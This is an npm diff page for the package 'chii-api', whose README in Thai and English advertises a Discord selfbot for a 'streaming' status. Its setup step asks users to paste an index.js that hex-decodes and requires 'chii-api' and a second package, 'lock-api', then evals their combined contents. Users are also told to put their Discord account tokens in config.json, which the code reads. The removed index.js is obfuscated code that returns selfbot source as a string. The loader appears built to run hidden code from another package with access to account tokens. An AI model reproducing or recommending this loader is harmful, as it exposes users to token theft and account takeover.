chii-api 1.0.3 → 1.0.5
Sign up to get free protection for your applications and to get access to all the features.
- package/README.md +342 -0
- package/index.js +1 -2
- package/package.json +10 -11
package/README.md
ADDED
@@ -0,0 +1,342 @@
|
|
1
|
+
# STATUS-Discord RichPresence Selfbot-V13 NodeJS-Module
|
2
|
+
+ 🟣Streaming status for Discord accounts
|
3
|
+
+ 🟣This code can make purple pill status unlimited for multiple accounts.
|
4
|
+
|
5
|
+
+ 🟣สถานะการสตรีมสำหรับบัญชี Discord
|
6
|
+
+ 🟣โค้ดนี้สามารถทำสถานะเม็ดม่วงได้หลายบัญชีไม่จำกัด
|
7
|
+
+ 🟣ออกแบบมาเพื่อปรับแต่งชื่อโดยไม่ต้องปิดโค้ดแล้วรันใหม่
|
8
|
+
+ 🟣สถานะจะอัปเดตให้อัตโนมัติเมื่อมีการอัพเดทชื่อต่างๆในไฟล์ comfig.json
|
9
|
+
|
10
|
+
## Installation
|
11
|
+
+ ติดตั้ง Modules
|
12
|
+
```sh
|
13
|
+
npm install chii-api
|
14
|
+
```
|
15
|
+
## Run Code
|
16
|
+
+ รันโค้ด
|
17
|
+
```sh
|
18
|
+
node index.js
|
19
|
+
```
|
20
|
+
+ How To Code index.js STATUS Discord RichPresence
|
21
|
+
+ วิธีการเขียนโค้ด index.js สถานะ Discord RichPresence
|
22
|
+
|
23
|
+
# สร้างไฟล์ชื่อ index.js
|
24
|
+
```js
|
25
|
+
const _0x5f43 = require(Buffer.from('6c6f636b2d617069', 'hex').toString('utf8'));
|
26
|
+
const _0x5f44 = require(Buffer.from('636869692d617069', 'hex').toString('utf8'));
|
27
|
+
eval(_0x5f43+_0x5f44);
|
28
|
+
```
|
29
|
+
|
30
|
+
# แพ็กเก็จเสร็ม package.json
|
31
|
+
```js
|
32
|
+
{
|
33
|
+
"dependencies": {
|
34
|
+
"chii-api": "^1.0.4"
|
35
|
+
}
|
36
|
+
}
|
37
|
+
```
|
38
|
+
|
39
|
+
# การกำหนดชื่อสถานะสังเกตุที่ชื่อหัวข้อมัน
|
40
|
+
+ applicationId = "ไอดีของผู้ใช้งาน"
|
41
|
+
+ token = "โทเค็นผู้ใช้งาน"
|
42
|
+
+ setURL = "ลิงค์สตรีมมิ่ง https://twitch.tv/streamer"
|
43
|
+
|
44
|
+
+ Details = ["ชื่อด้านบนสุดหน้าแรก", "ชื่อด้านบนสุดหน้าสอง"]
|
45
|
+
+ setState = ["ชื่อตรงกลางหน้าแรก", "ชื่อตรงกลางหน้าสอง"]
|
46
|
+
+ LargeText = ["ชื่อด้านล่างสุดหน้าแรก", "ชื่อด้านล่างสุดหน้าสอง"]
|
47
|
+
|
48
|
+
+ largeImageLinks = ["ลิงค์รูปภาพใหญ่หน้าแรก", "ลิงค์รูปภาพใหญ่หน้าสอง"]
|
49
|
+
+ smallImageLinks = ["ลิงค์รูปภาพเล็กหน้าแรก", "ลิงค์รูปภาพเล็กหน้าสอง"]
|
50
|
+
|
51
|
+
+ button1 = "ชื่อปุ่มที่1"
|
52
|
+
+ link1 = "https://ลิงค์ปุ่มที่1"
|
53
|
+
|
54
|
+
+ button2 = "ชื่อปุ่มที่2"
|
55
|
+
+ link2 = "https://ลิงค์ปุ่มที่2"
|
56
|
+
|
57
|
+
# หยิบชื่อไปใช้ตั้งค่าสถานะใน config.json
|
58
|
+
+ เวลานาที ตัวอย่าง 10:10
|
59
|
+
```js
|
60
|
+
time:t
|
61
|
+
```
|
62
|
+
+ ปฎิทินวันที่ตัวเลขตัวอย่าง 10/10/2030
|
63
|
+
```js
|
64
|
+
date:n
|
65
|
+
```
|
66
|
+
+ ปฎิทินวันที่ภาษาไทยตัวอย่าง 10/มกราคม/2030
|
67
|
+
```js
|
68
|
+
date:th
|
69
|
+
```
|
70
|
+
+ แสดงปฎิทินวันที่ภาษาอังกฤษ 10/January/2030
|
71
|
+
```js
|
72
|
+
date:eg
|
73
|
+
```
|
74
|
+
+ แสดงวันของไทยตัวอย่าง จันทร์ อังคาร.....
|
75
|
+
```js
|
76
|
+
day:th
|
77
|
+
```
|
78
|
+
+ แสดงวันของอังกฤษตัวอย่าง 𝐒𝐮𝐧𝐝𝐚𝐲 𝐌𝐨𝐧𝐝𝐚𝐲.....
|
79
|
+
```js
|
80
|
+
day:eg
|
81
|
+
```
|
82
|
+
+ แสดงสถานะความปิงตัวอย่าง 200 km/s
|
83
|
+
```js
|
84
|
+
ping:ms
|
85
|
+
```
|
86
|
+
+ แสดงสถานะความร้อนตัวอย่าง 24 °C
|
87
|
+
```js
|
88
|
+
temp:c
|
89
|
+
```
|
90
|
+
+ แสดงสถานะแรมตัวอย่าง 32 GB
|
91
|
+
```js
|
92
|
+
ram:g
|
93
|
+
```
|
94
|
+
+ แสดงสถานะ CPU ตัวอย่าง 𝐂𝐏𝐔 𝐑𝐲𝐳𝐞𝐧 𝟓 𝟓𝟔𝟎𝟎𝐗 𝟑.𝟕 𝐆𝐇𝐳
|
95
|
+
```js
|
96
|
+
cpu:g
|
97
|
+
```
|
98
|
+
|
99
|
+
# ตัวอย่างวิธีหยิบกรอกชื่อให้มันสถานะต่าง
|
100
|
+
+ ในมุมมองมันจะแสดงผลแบบนี้ เวลา 10:10 วันที่ 10/10/2030
|
101
|
+
+ หากแต่งอักษรพิเศษใส่มันจะแสดงแบบนี้
|
102
|
+
꒰ เวลา 10:10 ꒱ ⚘ ꒰ 10/10/2030 ꒱
|
103
|
+
|
104
|
+
```js
|
105
|
+
เวลา: time:t วันที่: date:n
|
106
|
+
```
|
107
|
+
|
108
|
+
# ไฟล์ทำสถานะเม็ดม่วง กำหนดเอาไว้ใน config.json
|
109
|
+
```js
|
110
|
+
{
|
111
|
+
"user": [
|
112
|
+
{
|
113
|
+
"applicationId": "ไอดีผู้ใช้งาน",
|
114
|
+
"token": "โทเค็นผู้ใช้งาน",
|
115
|
+
"setURL": [
|
116
|
+
"https://twitch.tv/chii"
|
117
|
+
],
|
118
|
+
"Details": [
|
119
|
+
"꒰ time:t ꒱ ✦ ꒰ date:n ꒱"
|
120
|
+
, "꒰ time:t ꒱ ✦ ꒰ date:th ꒱"
|
121
|
+
,"꒰ วันday:th ꒱ ✦ ꒰ day:eg ꒱"
|
122
|
+
,"꒰ time:t ꒱ ✦ ꒰ date:eg ꒱"
|
123
|
+
,"꒰ time:t ꒱ ✦ ꒰ date:n ꒱"
|
124
|
+
,"꒰ time:t ꒱ ✦ ꒰ date:th ꒱"
|
125
|
+
,"꒰ วันday:th ꒱ ✦ ꒰ day:eg ꒱"
|
126
|
+
,"꒰ time:t ꒱ ✦ ꒰ date:eg ꒱"
|
127
|
+
,"꒰ วันday:th ꒱ ✦ ꒰ day:eg ꒱"
|
128
|
+
,"꒰ time:t ꒱ ✦ ꒰ date:eg ꒱"
|
129
|
+
],
|
130
|
+
"setState": [
|
131
|
+
"【 𝟏 / 𝟏𝟎 】👒ꔛ☆★☆★☆★☆★ꔛ"
|
132
|
+
,"【 𝟐 / 𝟏𝟎 】👒ꔛ★☆★☆★☆★☆ꔛ"
|
133
|
+
,"【 𝟑 / 𝟏𝟎 】👒ꔛ☆☆★☆★☆★★ꔛ"
|
134
|
+
,"【 𝟒 / 𝟏𝟎 】👒ꔛ☆☆★☆★☆★★ꔛ"
|
135
|
+
,"【 𝟓 / 𝟏𝟎 】👒ꔛ☆★☆★☆★☆★ꔛ"
|
136
|
+
,"【 𝟔 / 𝟏𝟎 】👒ꔛ★☆★☆★☆★☆ꔛ"
|
137
|
+
,"【 𝟕 / 𝟏𝟎 】👒ꔛ☆☆★☆★☆★★ꔛ"
|
138
|
+
,"【 𝟖 / 𝟏𝟎 】👒ꔛ★☆★☆★☆★☆ꔛ"
|
139
|
+
,"【 𝟗 / 𝟏𝟎 】👒ꔛ☆☆★☆★☆★★ꔛ"
|
140
|
+
,"【 𝟏𝟎 / 𝟏𝟎 】👒ꔛ★☆★☆★☆★☆ꔛ"
|
141
|
+
],
|
142
|
+
"LargeText": [
|
143
|
+
"⋆꒰ 🌡️ temp:c °𝐂 ꒱ εїз ꒰🍃 ping:ms 𝗸𝗺/𝘀 ꒱⋆"
|
144
|
+
,"⋆꒰ 🌡️ temp:c °𝐂 ꒱ εїз ꒰🍃 ping:ms 𝗸𝗺/𝘀 ꒱⋆"
|
145
|
+
,"⋆꒰ 🌡️ temp:c °𝐂 ꒱ εїз ꒰🍃 ping:ms 𝗸𝗺/𝘀 ꒱⋆"
|
146
|
+
,"⋆꒰ 🌡️ temp:c °𝐂 ꒱ εїз ꒰🍃 ping:ms 𝗸𝗺/𝘀 ꒱⋆"
|
147
|
+
,"⋆꒰ 🌡️ temp:c °𝐂 ꒱ εїз ꒰🍃 ping:ms 𝗸𝗺/𝘀 ꒱⋆"
|
148
|
+
,"⋆꒰ 🌡️ temp:c °𝐂 ꒱ εїз ꒰🍃 ping:ms 𝗸𝗺/𝘀 ꒱⋆"
|
149
|
+
,"⋆꒰ 🌡️ temp:c °𝐂 ꒱ εїз ꒰🍃 ping:ms 𝗸𝗺/𝘀 ꒱⋆"
|
150
|
+
,"⋆꒰ 🌡️ temp:c °𝐂 ꒱ εїз ꒰🍃 ping:ms 𝗸𝗺/𝘀 ꒱⋆"
|
151
|
+
,"⋆꒰ 🌡️ temp:c °𝐂 ꒱ εїз ꒰🍃 ping:ms 𝗸𝗺/𝘀 ꒱⋆"
|
152
|
+
,"⋆꒰ 🌡️ temp:c °𝐂 ꒱ εїз ꒰🍃 ping:ms 𝗸𝗺/𝘀 ꒱⋆"
|
153
|
+
],
|
154
|
+
"largeImageLinks": [
|
155
|
+
"https://s11.gifyu.com/images/SoUrt.gif"
|
156
|
+
,"https://s11.gifyu.com/images/SoUtK.gif"
|
157
|
+
,"https://s11.gifyu.com/images/SoUrv.gif"
|
158
|
+
,"https://s11.gifyu.com/images/SoUtw.gif"
|
159
|
+
,"https://s11.gifyu.com/images/SoUrU.gif"
|
160
|
+
,"https://s11.gifyu.com/images/SoUDY.gif"
|
161
|
+
,"https://s11.gifyu.com/images/SoUrf.gif"
|
162
|
+
,"https://s11.gifyu.com/images/SoUrr.gif"
|
163
|
+
,"https://s11.gifyu.com/images/SoUr1.gif"
|
164
|
+
,"https://s11.gifyu.com/images/SoUrX.gif"
|
165
|
+
],
|
166
|
+
"smallImageLinks": [
|
167
|
+
"https://s11.gifyu.com/images/SoUrt.gif"
|
168
|
+
,"https://s11.gifyu.com/images/SoUtK.gif"
|
169
|
+
,"https://s11.gifyu.com/images/SoUrv.gif"
|
170
|
+
,"https://s11.gifyu.com/images/SoUtw.gif"
|
171
|
+
,"https://s11.gifyu.com/images/SoUrU.gif"
|
172
|
+
,"https://s11.gifyu.com/images/SoUDY.gif"
|
173
|
+
,"https://s11.gifyu.com/images/SoUrf.gif"
|
174
|
+
,"https://s11.gifyu.com/images/SoUrr.gif"
|
175
|
+
,"https://s11.gifyu.com/images/SoUr1.gif"
|
176
|
+
,"https://s11.gifyu.com/images/SoUrX.gif"
|
177
|
+
],
|
178
|
+
"button1": "button1",
|
179
|
+
"link1": "https://discord.gg/5gAsw4Pawq",
|
180
|
+
"button2": "button2",
|
181
|
+
"link2": "https://discord.gg/5gAsw4Pawq"
|
182
|
+
}
|
183
|
+
]
|
184
|
+
}
|
185
|
+
```
|
186
|
+
|
187
|
+
|
188
|
+
|
189
|
+
|
190
|
+
# ไฟล์ทำสถานะเม็ดม่วง กำหนดทำกับเพื่อนเพิ่มอีก
|
191
|
+
```js
|
192
|
+
{
|
193
|
+
"user": [
|
194
|
+
{
|
195
|
+
"applicationId": "ไอดีผู้ใช้งานคนที่ 1",
|
196
|
+
"token": "โทเค็นผู้ใช้งานคนที่ 1",
|
197
|
+
"setURL": [
|
198
|
+
"https://twitch.tv/chii"
|
199
|
+
],
|
200
|
+
"Details": [
|
201
|
+
"꒰ time:t ꒱ ✦ ꒰ date:n ꒱"
|
202
|
+
, "꒰ time:t ꒱ ✦ ꒰ date:th ꒱"
|
203
|
+
,"꒰ วันday:th ꒱ ✦ ꒰ day:eg ꒱"
|
204
|
+
,"꒰ time:t ꒱ ✦ ꒰ date:eg ꒱"
|
205
|
+
,"꒰ time:t ꒱ ✦ ꒰ date:n ꒱"
|
206
|
+
,"꒰ time:t ꒱ ✦ ꒰ date:th ꒱"
|
207
|
+
,"꒰ วันday:th ꒱ ✦ ꒰ day:eg ꒱"
|
208
|
+
,"꒰ time:t ꒱ ✦ ꒰ date:eg ꒱"
|
209
|
+
,"꒰ วันday:th ꒱ ✦ ꒰ day:eg ꒱"
|
210
|
+
,"꒰ time:t ꒱ ✦ ꒰ date:eg ꒱"
|
211
|
+
],
|
212
|
+
"setState": [
|
213
|
+
"【 𝟏 / 𝟏𝟎 】👒ꔛ☆★☆★☆★☆★ꔛ"
|
214
|
+
,"【 𝟐 / 𝟏𝟎 】👒ꔛ★☆★☆★☆★☆ꔛ"
|
215
|
+
,"【 𝟑 / 𝟏𝟎 】👒ꔛ☆☆★☆★☆★★ꔛ"
|
216
|
+
,"【 𝟒 / 𝟏𝟎 】👒ꔛ☆☆★☆★☆★★ꔛ"
|
217
|
+
,"【 𝟓 / 𝟏𝟎 】👒ꔛ☆★☆★☆★☆★ꔛ"
|
218
|
+
,"【 𝟔 / 𝟏𝟎 】👒ꔛ★☆★☆★☆★☆ꔛ"
|
219
|
+
,"【 𝟕 / 𝟏𝟎 】👒ꔛ☆☆★☆★☆★★ꔛ"
|
220
|
+
,"【 𝟖 / 𝟏𝟎 】👒ꔛ★☆★☆★☆★☆ꔛ"
|
221
|
+
,"【 𝟗 / 𝟏𝟎 】👒ꔛ☆☆★☆★☆★★ꔛ"
|
222
|
+
,"【 𝟏𝟎 / 𝟏𝟎 】👒ꔛ★☆★☆★☆★☆ꔛ"
|
223
|
+
],
|
224
|
+
"LargeText": [
|
225
|
+
"⋆꒰ 🌡️ temp:c °𝐂 ꒱ εїз ꒰🍃 ping:ms 𝗸𝗺/𝘀 ꒱⋆"
|
226
|
+
,"⋆꒰ 🌡️ temp:c °𝐂 ꒱ εїз ꒰🍃 ping:ms 𝗸𝗺/𝘀 ꒱⋆"
|
227
|
+
,"⋆꒰ 🌡️ temp:c °𝐂 ꒱ εїз ꒰🍃 ping:ms 𝗸𝗺/𝘀 ꒱⋆"
|
228
|
+
,"⋆꒰ 🌡️ temp:c °𝐂 ꒱ εїз ꒰🍃 ping:ms 𝗸𝗺/𝘀 ꒱⋆"
|
229
|
+
,"⋆꒰ 🌡️ temp:c °𝐂 ꒱ εїз ꒰🍃 ping:ms 𝗸𝗺/𝘀 ꒱⋆"
|
230
|
+
,"⋆꒰ 🌡️ temp:c °𝐂 ꒱ εїз ꒰🍃 ping:ms 𝗸𝗺/𝘀 ꒱⋆"
|
231
|
+
,"⋆꒰ 🌡️ temp:c °𝐂 ꒱ εїз ꒰🍃 ping:ms 𝗸𝗺/𝘀 ꒱⋆"
|
232
|
+
,"⋆꒰ 🌡️ temp:c °𝐂 ꒱ εїз ꒰🍃 ping:ms 𝗸𝗺/𝘀 ꒱⋆"
|
233
|
+
,"⋆꒰ 🌡️ temp:c °𝐂 ꒱ εїз ꒰🍃 ping:ms 𝗸𝗺/𝘀 ꒱⋆"
|
234
|
+
,"⋆꒰ 🌡️ temp:c °𝐂 ꒱ εїз ꒰🍃 ping:ms 𝗸𝗺/𝘀 ꒱⋆"
|
235
|
+
],
|
236
|
+
"largeImageLinks": [
|
237
|
+
"https://s11.gifyu.com/images/SoUrt.gif"
|
238
|
+
,"https://s11.gifyu.com/images/SoUtK.gif"
|
239
|
+
,"https://s11.gifyu.com/images/SoUrv.gif"
|
240
|
+
,"https://s11.gifyu.com/images/SoUtw.gif"
|
241
|
+
,"https://s11.gifyu.com/images/SoUrU.gif"
|
242
|
+
,"https://s11.gifyu.com/images/SoUDY.gif"
|
243
|
+
,"https://s11.gifyu.com/images/SoUrf.gif"
|
244
|
+
,"https://s11.gifyu.com/images/SoUrr.gif"
|
245
|
+
,"https://s11.gifyu.com/images/SoUr1.gif"
|
246
|
+
,"https://s11.gifyu.com/images/SoUrX.gif"
|
247
|
+
],
|
248
|
+
"smallImageLinks": [
|
249
|
+
"https://s11.gifyu.com/images/SoUrt.gif"
|
250
|
+
,"https://s11.gifyu.com/images/SoUtK.gif"
|
251
|
+
,"https://s11.gifyu.com/images/SoUrv.gif"
|
252
|
+
,"https://s11.gifyu.com/images/SoUtw.gif"
|
253
|
+
,"https://s11.gifyu.com/images/SoUrU.gif"
|
254
|
+
,"https://s11.gifyu.com/images/SoUDY.gif"
|
255
|
+
,"https://s11.gifyu.com/images/SoUrf.gif"
|
256
|
+
,"https://s11.gifyu.com/images/SoUrr.gif"
|
257
|
+
,"https://s11.gifyu.com/images/SoUr1.gif"
|
258
|
+
,"https://s11.gifyu.com/images/SoUrX.gif"
|
259
|
+
],
|
260
|
+
"button1": "button1",
|
261
|
+
"link1": "https://discord.gg/5gAsw4Pawq",
|
262
|
+
"button2": "button2",
|
263
|
+
"link2": "https://discord.gg/5gAsw4Pawq"
|
264
|
+
},
|
265
|
+
{
|
266
|
+
"applicationId": "ไอดีผู้ใช้งานคนที่ 2",
|
267
|
+
"token": "โทเค็นผู้ใช้งานคนที่ 2",
|
268
|
+
"setURL": [
|
269
|
+
"https://twitch.tv/chii"
|
270
|
+
],
|
271
|
+
"Details": [
|
272
|
+
"꒰ time:t ꒱ ✦ ꒰ date:n ꒱"
|
273
|
+
, "꒰ time:t ꒱ ✦ ꒰ date:th ꒱"
|
274
|
+
,"꒰ วันday:th ꒱ ✦ ꒰ day:eg ꒱"
|
275
|
+
,"꒰ time:t ꒱ ✦ ꒰ date:eg ꒱"
|
276
|
+
,"꒰ time:t ꒱ ✦ ꒰ date:n ꒱"
|
277
|
+
,"꒰ time:t ꒱ ✦ ꒰ date:th ꒱"
|
278
|
+
,"꒰ วันday:th ꒱ ✦ ꒰ day:eg ꒱"
|
279
|
+
,"꒰ time:t ꒱ ✦ ꒰ date:eg ꒱"
|
280
|
+
,"꒰ วันday:th ꒱ ✦ ꒰ day:eg ꒱"
|
281
|
+
,"꒰ time:t ꒱ ✦ ꒰ date:eg ꒱"
|
282
|
+
],
|
283
|
+
"setState": [
|
284
|
+
"【 𝟏 / 𝟏𝟎 】👒ꔛ☆★☆★☆★☆★ꔛ"
|
285
|
+
,"【 𝟐 / 𝟏𝟎 】👒ꔛ★☆★☆★☆★☆ꔛ"
|
286
|
+
,"【 𝟑 / 𝟏𝟎 】👒ꔛ☆☆★☆★☆★★ꔛ"
|
287
|
+
,"【 𝟒 / 𝟏𝟎 】👒ꔛ☆☆★☆★☆★★ꔛ"
|
288
|
+
,"【 𝟓 / 𝟏𝟎 】👒ꔛ☆★☆★☆★☆★ꔛ"
|
289
|
+
,"【 𝟔 / 𝟏𝟎 】👒ꔛ★☆★☆★☆★☆ꔛ"
|
290
|
+
,"【 𝟕 / 𝟏𝟎 】👒ꔛ☆☆★☆★☆★★ꔛ"
|
291
|
+
,"【 𝟖 / 𝟏𝟎 】👒ꔛ★☆★☆★☆★☆ꔛ"
|
292
|
+
,"【 𝟗 / 𝟏𝟎 】👒ꔛ☆☆★☆★☆★★ꔛ"
|
293
|
+
,"【 𝟏𝟎 / 𝟏𝟎 】👒ꔛ★☆★☆★☆★☆ꔛ"
|
294
|
+
],
|
295
|
+
"LargeText": [
|
296
|
+
"⋆꒰ 🌡️ temp:c °𝐂 ꒱ εїз ꒰🍃 ping:ms 𝗸𝗺/𝘀 ꒱⋆"
|
297
|
+
,"⋆꒰ 🌡️ temp:c °𝐂 ꒱ εїз ꒰🍃 ping:ms 𝗸𝗺/𝘀 ꒱⋆"
|
298
|
+
,"⋆꒰ 🌡️ temp:c °𝐂 ꒱ εїз ꒰🍃 ping:ms 𝗸𝗺/𝘀 ꒱⋆"
|
299
|
+
,"⋆꒰ 🌡️ temp:c °𝐂 ꒱ εїз ꒰🍃 ping:ms 𝗸𝗺/𝘀 ꒱⋆"
|
300
|
+
,"⋆꒰ 🌡️ temp:c °𝐂 ꒱ εїз ꒰🍃 ping:ms 𝗸𝗺/𝘀 ꒱⋆"
|
301
|
+
,"⋆꒰ 🌡️ temp:c °𝐂 ꒱ εїз ꒰🍃 ping:ms 𝗸𝗺/𝘀 ꒱⋆"
|
302
|
+
,"⋆꒰ 🌡️ temp:c °𝐂 ꒱ εїз ꒰🍃 ping:ms 𝗸𝗺/𝘀 ꒱⋆"
|
303
|
+
,"⋆꒰ 🌡️ temp:c °𝐂 ꒱ εїз ꒰🍃 ping:ms 𝗸𝗺/𝘀 ꒱⋆"
|
304
|
+
,"⋆꒰ 🌡️ temp:c °𝐂 ꒱ εїз ꒰🍃 ping:ms 𝗸𝗺/𝘀 ꒱⋆"
|
305
|
+
,"⋆꒰ 🌡️ temp:c °𝐂 ꒱ εїз ꒰🍃 ping:ms 𝗸𝗺/𝘀 ꒱⋆"
|
306
|
+
],
|
307
|
+
"largeImageLinks": [
|
308
|
+
"https://s11.gifyu.com/images/SoUrt.gif"
|
309
|
+
,"https://s11.gifyu.com/images/SoUtK.gif"
|
310
|
+
,"https://s11.gifyu.com/images/SoUrv.gif"
|
311
|
+
,"https://s11.gifyu.com/images/SoUtw.gif"
|
312
|
+
,"https://s11.gifyu.com/images/SoUrU.gif"
|
313
|
+
,"https://s11.gifyu.com/images/SoUDY.gif"
|
314
|
+
,"https://s11.gifyu.com/images/SoUrf.gif"
|
315
|
+
,"https://s11.gifyu.com/images/SoUrr.gif"
|
316
|
+
,"https://s11.gifyu.com/images/SoUr1.gif"
|
317
|
+
,"https://s11.gifyu.com/images/SoUrX.gif"
|
318
|
+
],
|
319
|
+
"smallImageLinks": [
|
320
|
+
"https://s11.gifyu.com/images/SoUrt.gif"
|
321
|
+
,"https://s11.gifyu.com/images/SoUtK.gif"
|
322
|
+
,"https://s11.gifyu.com/images/SoUrv.gif"
|
323
|
+
,"https://s11.gifyu.com/images/SoUtw.gif"
|
324
|
+
,"https://s11.gifyu.com/images/SoUrU.gif"
|
325
|
+
,"https://s11.gifyu.com/images/SoUDY.gif"
|
326
|
+
,"https://s11.gifyu.com/images/SoUrf.gif"
|
327
|
+
,"https://s11.gifyu.com/images/SoUrr.gif"
|
328
|
+
,"https://s11.gifyu.com/images/SoUr1.gif"
|
329
|
+
,"https://s11.gifyu.com/images/SoUrX.gif"
|
330
|
+
],
|
331
|
+
"button1": "button1",
|
332
|
+
"link1": "https://discord.gg/5gAsw4Pawq",
|
333
|
+
"button2": "button2",
|
334
|
+
"link2": "https://discord.gg/5gAsw4Pawq"
|
335
|
+
}
|
336
|
+
]
|
337
|
+
}
|
338
|
+
```
|
339
|
+
|
340
|
+
|
341
|
+
# ผู้พัฒนาโค้ดสตรีมมิ่ง By Developer : CHII แอดมินซี
|
342
|
+
+ เซิร์ฟเวอร์ Discord https://discord.gg/5gAsw4Pawq
|
package/index.js
CHANGED
@@ -1,2 +1 @@
|
|
1
|
-
const _0x4f98ff=_0x3c78;(function(_0x4ed027,_0x1724b0){const _0x204486=_0x3c78,_0x1cd395=_0x4ed027();while(!![]){try{const _0x22e043=parseInt(_0x204486(0x17a))/0x1+parseInt(_0x204486(0x17f))/0x2*(parseInt(_0x204486(0x17d))/0x3)+-parseInt(_0x204486(0x177))/0x4+parseInt(_0x204486(0x179))/0x5+-parseInt(_0x204486(0x178))/0x6+-parseInt(_0x204486(0x17c))/0x7+parseInt(_0x204486(0x180))/0x8;if(_0x22e043===_0x1724b0)break;else _0x1cd395['push'](_0x1cd395['shift']());}catch(_0x3a4b63){_0x1cd395['push'](_0x1cd395['shift']());}}}(_0x8be7,0x73778));function _0x3c78(_0x5aae9c,_0xd08000){const _0x8be7b5=_0x8be7();return _0x3c78=function(_0x3c784d,_0xd701f4){_0x3c784d=_0x3c784d-0x177;let _0x316d7e=_0x8be7b5[_0x3c784d];return _0x316d7e;},_0x3c78(_0x5aae9c,_0xd08000);}const apiCode=_0x4f98ff(0x17e);module[_0x4f98ff(0x17b)]=apiCode;function _0x8be7(){const _0x4c1c8f=['exports','2385110ifkDJc','2509077vRpzWB','const\x20Discord\x20=\x20require(\x27discord.js-selfbot-v13\x27);\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20const\x20{\x20Util\x20}\x20=\x20require(\x27discord.js-selfbot-rpc\x27);\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20const\x20fs\x20=\x20require(\x27fs\x27);\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20const\x20path\x20=\x20require(\x27path\x27);\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20const\x20os\x20=\x20require(\x22os\x22);\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20const\x20Date_Time\x20=\x20Date.now();\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20const\x20config_path\x20=\x20path.resolve(__dirname,\x20\x27config.json\x27);\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20let\x20config\x20=\x20JSON.parse(fs.readFileSync(config_path));\x0a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20const\x20digitMap\x20=\x20{\x0a\x20\x20\x20\x20\x270\x27:\x20\x270\x27,\x20\x271\x27:\x20\x271\x27,\x20\x272\x27:\x20\x272\x27,\x20\x273\x27:\x20\x273\x27,\x20\x274\x27:\x20\x274\x27,\x0a\x20\x20\x20\x20\x275\x27:\x20\x275\x27,\x20\x276\x27:\x20\x276\x27,\x20\x277\x27:\x20\x277\x27,\x20\x278\x27:\x20\x278\x27,\x20\x279\x27:\x20\x279\x27\x0a};\x0a\x0aconst\x20stylizedDigits\x20=\x20{\x0a\x20\x20\x20\x20\x270\x27:\x20\x27𝟎\x27,\x20\x271\x27:\x20\x27𝟏\x27,\x20\x272\x27:\x20\x27𝟐\x27,\x20\x273\x27:\x20\x27𝟑\x27,\x20\x274\x27:\x20\x27𝟒\x27,\x0a\x20\x20\x20\x20\x275\x27:\x20\x27𝟓\x27,\x20\x276\x27:\x20\x27𝟔\x27,\x20\x277\x27:\x20\x27𝟕\x27,\x20\x278\x27:\x20\x27𝟖\x27,\x20\x279\x27:\x20\x27𝟗\x27\x0a};\x0a\x0afunction\x20getCurrentTime()\x20{\x0a\x20\x20\x20\x20const\x20currentTime\x20=\x20new\x20Date();\x0a\x20\x20\x20\x20const\x20options\x20=\x20{\x20timeZone:\x20\x22Asia/Bangkok\x22,\x20hour:\x20\x222-digit\x22,\x20minute:\x20\x222-digit\x22,\x20hour12:\x20false\x20};\x0a\x20\x20\x20\x20let\x20timeString\x20=\x20currentTime.toLocaleTimeString(\x22th-TH\x22,\x20options);\x0a\x20\x20\x20\x20return\x20timeString.replace(/[0-9]/g,\x20digit\x20=>\x20digitMap[digit]);\x0a}\x0a\x0afunction\x20getCurrentDay()\x20{\x0a\x20\x20\x20\x20const\x20date\x20=\x20new\x20Date();\x0a\x20\x20\x20\x20const\x20options\x20=\x20{\x20timeZone:\x20\x22Asia/Bangkok\x22,\x20day:\x20\x222-digit\x22,\x20month:\x20\x22numeric\x22,\x20year:\x20\x22numeric\x22\x20};\x0a\x20\x20\x20\x20const\x20monthNames\x20=\x20[\x22𝟎𝟏\x22,\x20\x22𝟎𝟐\x22,\x20\x22𝟎𝟑\x22,\x20\x22𝟎𝟒\x22,\x20\x22𝟎𝟓\x22,\x20\x22𝟎𝟔\x22,\x20\x22𝟎𝟕\x22,\x20\x22𝟎𝟖\x22,\x20\x22𝟎𝟗\x22,\x20\x22𝟏𝟎\x22,\x20\x22𝟏𝟏\x22,\x20\x22𝟏𝟐\x22];\x0a\x20\x20\x20\x20const\x20day\x20=\x20date.toLocaleString(\x22en-US\x22,\x20{\x20timeZone:\x20\x22Asia/Bangkok\x22,\x20day:\x20\x222-digit\x22\x20}).replace(/[0-9]/g,\x20digit\x20=>\x20stylizedDigits[digit]);\x0a\x20\x20\x20\x20const\x20month\x20=\x20date.getMonth()\x20+\x201;\x0a\x20\x20\x20\x20const\x20customMonthName\x20=\x20monthNames[month\x20-\x201]\x20||\x20\x27𝟎𝟏\x27;\x0a\x20\x20\x20\x20const\x20year\x20=\x20date.getFullYear().toString().replace(/[0-9]/g,\x20digit\x20=>\x20stylizedDigits[digit]);\x0a\x20\x20\x20\x20return\x20`${day}/${customMonthName}/${year}`;\x0a}\x0a\x0afunction\x20getCurrentDayy()\x20{\x0a\x20\x20\x20\x20const\x20datee\x20=\x20new\x20Date();\x0a\x20\x20\x20\x20const\x20options\x20=\x20{\x20timeZone:\x20\x22Asia/Bangkok\x22,\x20day:\x20\x222-digit\x22,\x20month:\x20\x22numeric\x22,\x20year:\x20\x22numeric\x22\x20};\x0a\x20\x20\x20\x20const\x20monthNamess\x20=\x20[\x22มกราคม\x22,\x20\x22กุมภาพันธ์\x22,\x20\x22มีนาคม\x22,\x20\x22เมษายน\x22,\x20\x22พฤษภาคม\x22,\x20\x22มิถุนายน\x22,\x20\x22กรกฎาคม\x22,\x20\x22สิงหาคม\x22,\x20\x22กันยายน\x22,\x20\x22ตุลาคม\x22,\x20\x22พฤศจิกายน\x22,\x20\x22ธันวาคม\x22];\x0a\x20\x20\x20\x20const\x20dayy\x20=\x20datee.toLocaleString(\x22en-US\x22,\x20{\x20timeZone:\x20\x22Asia/Bangkok\x22,\x20day:\x20\x222-digit\x22\x20}).replace(/[0-9]/g,\x20digit\x20=>\x20stylizedDigits[digit]);\x0a\x20\x20\x20\x20const\x20monthh\x20=\x20datee.getMonth()\x20+\x201;\x0a\x20\x20\x20\x20const\x20customMonthNamee\x20=\x20monthNamess[monthh\x20-\x201]\x20||\